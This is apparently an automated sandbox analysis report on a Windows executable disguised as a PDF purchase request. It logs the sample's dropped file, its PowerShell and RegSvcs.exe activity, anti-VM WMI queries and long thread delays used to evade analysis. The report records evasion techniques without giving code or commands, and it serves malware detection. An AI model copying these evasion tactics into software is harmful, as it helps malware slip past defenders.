                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe PID: 7552, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vmPeKTe.exe PID: 8140, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeMemory allocated: 3130000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeMemory allocated: 3340000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeMemory allocated: 5340000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeMemory allocated: 5920000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeMemory allocated: 6920000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeMemory allocated: 6A50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeMemory allocated: 7A50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeMemory allocated: A7A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeMemory allocated: B7A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeMemory allocated: BC30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeMemory allocated: CC30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeMemory allocated: B20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeMemory allocated: 25D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeMemory allocated: B20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeMemory allocated: 4B10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeMemory allocated: 5B10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeMemory allocated: 5C40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeMemory allocated: 6C40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeMemory allocated: 94E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeMemory allocated: A4E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeMemory allocated: B4E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeMemory allocated: B970000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3909Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4948Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1598Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1582Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2264
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7591
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe TID: 7572Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8080Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8000Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8104Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8028Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exe TID: 752Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99641Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99516Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99406Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99187Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98810Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98681Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98513Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98187Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97968Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97836Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99561
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98903
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98782
